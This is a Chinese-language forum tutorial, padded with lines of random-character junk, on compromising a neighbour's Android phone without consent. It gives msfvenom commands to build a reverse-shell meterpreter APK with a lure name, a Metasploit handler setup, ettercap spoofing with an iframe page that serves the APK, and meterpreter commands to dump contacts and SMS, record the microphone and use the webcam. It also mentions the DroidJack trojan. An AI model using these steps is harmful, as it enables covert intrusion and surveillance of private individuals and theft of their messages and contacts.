5 W- J& t3 z: v3 P$ j% c' r9 s 五、msf+ettercap入侵邻居安卓手机
$ Q2 y6 K: h1 R3 I* h# O* x
: M; c# p' ^; w$ m2 v$ }7 i
; V. g* f a7 J6 k" x+ N5 u& n 首先启动msf ! J4 |; I/ A- f& @4 T; B, T
/ \ |$ j S. F* s* X0 B+ C2 `
, ~# I4 }% G% V# i, m 先用kali生成一个安卓木马,如下命令: & Z) Q+ X" w4 |3 A! Q- B+ q
9 \; ~: R G& E, g' r3 X4 C* I5 M, y5 T c
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk & V- [* @1 E) }$ d" `
. g Q6 L# r6 P- y& g3 Y' D, n& [5 o9 _: q" V
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
4 o7 b# t' d e + ?0 x7 b8 `) o) \: E6 m( I; g
' m, i# }& A1 i9 x; K+ E& _0 S
然后进入msf $ `; t* O" V6 u: ?% J9 Y2 t* l0 c
0 F. q( t, Q8 V' Z L
: w8 S0 I x5 \; q' s7 _ use exploit/multi/handler ) x# P' p( { i8 o( w% t
- O4 q3 z) \& B$ {* x6 ?7 \( m2 g' e* C0 R$ n
set payload android/meterpreter/reverse_tcp $ [/ [. Y, [& R, B- D3 a6 g- W
4 M2 a* ?. t- X# a
; I9 }- B- ~' E- A set LHOST 192.168.0.109 //ip为kaili的ip # r* z8 k$ [, v
) U4 m* b. {' @- z
9 T% Z& V- R9 B' y" J. z9 c
set LPORT 44444 //端口一定要与前面生成的木马的端口一致 / X' K5 S: d2 G& N9 \( _4 M( D$ E
+ R) ^7 @: c- s- b, W# T& q" v/ c& [7 L& b2 O6 p! ~) a& ~
Exploit
- U5 M/ r4 _* d F7 \
& _( C# I3 r7 s
+ \# m% d, P p% `. E5 j Y0 ]4 G9 S. X ' Z2 S$ Y) S1 Y; F+ ~$ k
4 |. O3 O+ |$ B H2 f& n8 x, q |# R1 m. G
下面我们开启ettercap -G ) s: G9 s& Z2 w! K5 [
1 D! B+ u8 u, T5 L- |4 ^. b5 U- K
* y: I- U, C8 k. a 我物理IP为 + z# Y8 s& a2 o2 O' w
4 N" h) h2 G; T- z# N" g
+ G2 q) d7 L- [ k9 l2 b8 w5 B2 \: n
. m- ^7 k( n- c' M1 U* P+ D
W. `; |4 e4 q8 b9 d
' g. S P0 L) \: Z 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
9 j+ X2 i. k" d+ P ' ?! w; M$ j9 }6 ?
) @- @5 ` I) w- t0 n1 l 下面我们来设置一下
# Y6 l# G5 r" K, X, `( x& p3 A2 P% V5 g
1 D4 _& Q1 T/ M* r* J8 T- V
5 I- N# c l* z6 K- ?( D" T% \' X 7 d' s1 y: P6 x- b% e* `
& D, l/ Q ~- C. z4 T+ f
; @. l% _8 z" ]* F5 L( ]6 v 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, & U( ?* {2 I u' r
1 {3 C1 m0 h2 i9 I0 ] V+ G
. w0 e+ X. i8 e# ^- ~
) z/ J" l9 f' N) g
- l% F2 P4 d! t' W: p: E$ t
- p# x9 ?' H4 C6 G
+ x8 h# }( T( E0 j
5 z6 d# V* h' q* w( S
+ @) j: P! B, T3 f" r6 P* ? ) V7 h4 l( {1 o
O4 g z* K& z9 c& v
8 U9 J: ?6 U$ f4 q , I5 m5 G F t. h9 T9 q' }
& k2 j/ u' b% Y
: P" N8 A+ Z5 R" ]5 K
4 Z! U4 G7 Q1 E7 H* N
) k$ H2 l$ l1 ?, ^3 x4 S( B
" m/ y& a) B- M9 l# `3 v+ I$ F & L, e$ p5 f' \* Q9 P
% W: S2 ?. x- A* }2 V2 F4 _! a$ A! \
0 s6 d& H0 I3 P) }+ s; x; h2 }# N) W
% Z0 w9 }, k% v9 ]. |+ B: h
9 z9 p3 x* | d) ~ ! u2 o8 e" L5 v; h4 F1 c
; [0 @8 X9 y1 a9 T' B" p. V% Q. n: f
2 Z5 F7 \& Y9 |+ t
6 [7 I- ^: p# O0 k" M5 p' }7 [! R6 E P 2 o: J8 d+ [0 F/ i
9 h6 c- ~+ h& L" r( A
* `* T- j; q/ \+ t3 i: b 0 v' f5 Y2 S1 y- p/ m1 X @
+ U- W: U( a$ v% I) U2 o4 t
. U9 m& \) N& U- Y+ y 8 R" g; V) r$ E; t* Q3 e) Z; b& h
4 H5 X$ K3 s Q+ z. |. F; b
, p+ l: g- b- Y8 E' b ^# p! c ' n" V7 T$ X( Q5 t% s: J
' M: i9 g ^3 i0 \; a
. S7 B, H* m# Y5 x% {' @/ e' {. @
! _* {/ V- R: E; H' c
+ s3 V* D0 R/ b- J5 K' u" t4 x! Z 下面我们开始攻击
+ K- S( m8 v" y
0 b6 Y) T) q2 G8 `' m) l6 V9 n
; i' o5 t: f+ _- v* D; ? * M- j. n3 c3 a. P+ \
4 `# x+ X: K( F% u$ G: L3 V# A- ~" l
- F4 c' o0 E9 y( v/ [3 R; Y % X5 p$ C& i* P8 w/ p. j- j
1 W# ]+ w& V3 B6 {- y1 S6 H( X% g" y. h. I. V0 ~
7 ~" N+ ~2 m2 A1 j0 q( ] 0 Z9 \% z( U( A5 k
5 U, ^5 z( \& n5 ~! M% c
" `7 i1 R# }/ u4 `) s7 T$ y8 f5 U
{: L1 R, [! v) f
# y; Y( Z- @ W0 S9 _5 b8 k, g, z
( f8 v0 C2 B. G
7 u8 Z( G7 H( n
& z: F# x( l4 _2 E' b0 L 大概过了5分钟多,发现反弹成功了 1 h4 I' ?/ q6 H% A
! S9 D. I. e0 D$ M+ L9 z' x5 B0 V1 g! u6 q
2 _/ @; r5 g4 n1 j' q# t7 {
. w' V; W1 j9 y6 D9 f p V t. W8 B
8 H1 M2 G4 T* q* f! z
) J6 \( k9 u; N) l
+ a& F+ a' H' J z; ] : f/ p& p) }: H f
' C2 C8 } J2 D2 |
( f$ u0 K$ G* ^$ a5 o6 k, n
! r% a) t0 V9 B+ ]8 V 3 B$ `" L1 X8 O7 J) k
5 t) P2 p1 o# U' ^" Y) X$ f ; r6 C1 U* b& o: a; N' [' O
5 |7 y2 q1 D! h' F4 r
: I- |8 k8 f" l9 Q' y
v5 c1 x( l* `# l P9 C
& G4 ^* K: u. r) t, X8 i [; T5 @2 Z! O" W
, Y. c Z, i2 Z4 _- x
8 C4 l6 Q Y3 }5 ?" a
3 k% w: }; g( B4 Q) `' x 执行命令
4 U; W8 I: W' {# d2 K6 c & b9 u, L; d7 S6 ?
- n4 K% D0 { A- L0 p" v
, T9 _ i7 ^8 H" C9 V
/ Z# {/ w/ Q3 B; W% o; ^4 q! Q ]% V0 f! U# m
dump_contacts --》这个是导出电话 8 q- F" D3 k8 U* n S" s
. w3 L* P. L. Q5 T. W
1 N4 E# \$ w) t' d3 Z; n; U/ @
dump_sms --》这个是导出信息 $ @' m! i3 D0 ^- }* a, W! I2 [
8 C" L. |* L# w0 S
- @4 `9 p4 ^" z$ ^0 j4 j record_mic Record audio from the default microphone for X seconds # s/ V, A6 B U w
8 m$ Q9 T- D# u. C. v) X+ t; C
( I3 s( o' t! n! Y; [1 s( B5 e
webcam_chat Start a video chat - H* F* o3 \6 d- b; _. R/ _
# Q- f$ A1 z& e h9 [0 X; h- B0 n. ` }* j4 A6 T
webcam_list List webcams 9 \( a/ E- H" ?3 S) Y$ H
; O1 a$ s) b% t3 T8 \$ T3 d, l3 `! u
webcam_snap Take a snapshot from the specified webcam ( r. {/ Z# U- }# H! @
' {3 ], P9 O7 \# e" |* H
) U* {% p9 p5 b J: a8 T, C. j, y$ N0 v webcam_stream   lay a video stream from the specified webcam ) B" [8 y) k$ y7 U, D4 ?0 j/ C
9 D) H: F) c: [; Q
( c3 Q/ [ T( W1 K
5 D) ~0 _) j! V" J( s5 ?* {. c - a! y4 B7 M8 n5 I; R G4 |
- s! c9 w) M& N( w6 W, w4 w1 M
/ H2 i/ w4 L3 J, i6 N( Y , g! G; [ E- y, A' O. M/ z& J8 r
1 q N' t o N, u. Y, r2 U
我们打开看一下电话薄,
, K+ s2 A: G* r1 ?* c" K
& u1 B* V% ?5 A9 @/ a7 j$ H! x
7 R4 k: K0 h2 z) v
+ H8 }' g, k8 A' b4 C$ D 8 P) c7 L2 y$ Y* h7 I: h
/ n4 M& k: `% l. d) M1 ~5 _1 t6 e
1 f) z0 ~* c5 z6 @& w9 R$ v
9 k v! y% V! v: T8 n) r- {/ D( x7 _" f2 k5 h
6 Q7 E) ~+ A. Q' m" j
, p8 S8 ~1 q* F, N9 j; G+ G- w5 s% ]' K( ~
9 ~* b3 _- X$ N0 q# Z
! R5 V, l4 Z+ U, A, T' Z4 q G" W, {8 r' b! b3 Y
4 D- U3 [2 H& F g, V7 j
$ W9 V' _/ V3 Z! A9 \$ j# E+ C
. C/ Z6 p% Q2 M 4 Y2 R; {- r5 [* Y
; W6 ?& C# }( k& D0 j! ], Q
6 j" P# Y# n/ o! g; c 我们同时欺骗成DroidJack木马,使用方法如图: R* P% y7 K5 v3 Q7 ^8 i4 j
( r# a W" h5 y9 W6 z Z4 ~! Y$ E* B
# u' w- O( S9 @2 B7 y9 i$ _: ]
; j3 ]% \' D }* \7 B/ a! z, h + s& b3 ]5 n# _8 b3 R
F5 v- @) h. F0 z" H
1 c* b$ {) Q }
# ` Q( T* K7 M+ k0 @ H0 x6 ?2 L
1 @! H o- O i
7 b: G x4 D+ U1 n
' n- R; G: X6 j! Y. h1 f
5 I* P: l( X* g% Q! z# n 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 1 I$ R) U! @) V, }7 }# p) [0 \
; i' E! @2 f7 Y6 g+ D5 e# Z" |9 B" A9 b* @, p4 |7 S
- h8 J- l" T) m& b# n" z F) \9 s; V
* e2 E: W( @% X5 P6 M4 Y, {7 y( [6 X" V g" n
5 i' l% R* Q5 @( h
8 p; [" G( @& Z; E
; c8 P% v2 x" Q ; T0 w0 ~% p$ m! V7 d
, Q! {- X& F) p2 c1 w% R& I0 j9 L% \% g5 o
 5 \+ M0 ]+ n# a; E- h
' |2 B% P! j- Z
# L. ~7 F8 W6 y! R2 H
2 d8 o8 I2 p5 b |